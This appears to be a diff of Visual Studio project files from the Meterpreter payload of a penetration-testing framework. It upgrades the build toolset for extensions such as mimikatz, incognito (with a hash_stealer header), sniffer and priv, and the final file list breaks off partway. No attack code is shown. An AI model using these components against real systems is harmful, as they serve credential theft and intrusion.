<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">

20
c/meterpreter/workspace/elevator/elevator.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -44,45 +44,45 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -427,4 +427,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

20
c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -44,45 +44,45 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -492,4 +492,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

27
c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -44,45 +44,45 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -476,8 +476,15 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\incognito\hash_stealer.h" />
<ClInclude Include="..\..\source\extensions\incognito\incognito.h" />
<ClInclude Include="..\..\source\extensions\incognito\list_tokens.h" />
<ClInclude Include="..\..\source\extensions\incognito\token_info.h" />
<ClInclude Include="..\..\source\extensions\incognito\user_management.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

20
c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -44,45 +44,45 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -485,4 +485,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

20
c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -44,45 +44,45 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -675,4 +675,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

20
c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -43,49 +43,49 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -698,4 +698,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

12
c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="r7_debug|Win32">
<Configuration>r7_debug</Configuration>
@ -21,32 +21,32 @@
<PropertyGroup Label="Globals">
<ProjectGuid>{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}</ProjectGuid>
<RootNamespace>ext_server_sniffer</RootNamespace>
<PssdkVersion>vc11</PssdkVersion>
<PssdkVersion>vc12</PssdkVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">

75
c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -43,49 +43,49 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -599,47 +599,48 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\stdapi\server\general.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\arp.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\general.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\arp.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\netstat.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\proxy_config.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\resolve.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\stdapi.c">
<PreCompiledHeader>Create</PreCompiledHeader>
</ClCompile>
<ClCompile Include="..\..\source\extensions\stdapi\server\fs\dir.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\fs\file.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\fs\fs_util.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\fs\dir.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\fs\file.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\fs\fs_util.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\fs\search.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\net.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\interface.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\route.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\net\socket\tcp.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\net\net.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\interface.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\config\route.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\socket\tcp.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\socket\tcp_server.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\net\socket\udp.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\session.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\image.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\in-mem-exe.c"/>
<ClCompile Include="..\..\source\extensions\stdapi\server\sys\process\memory.c"/>
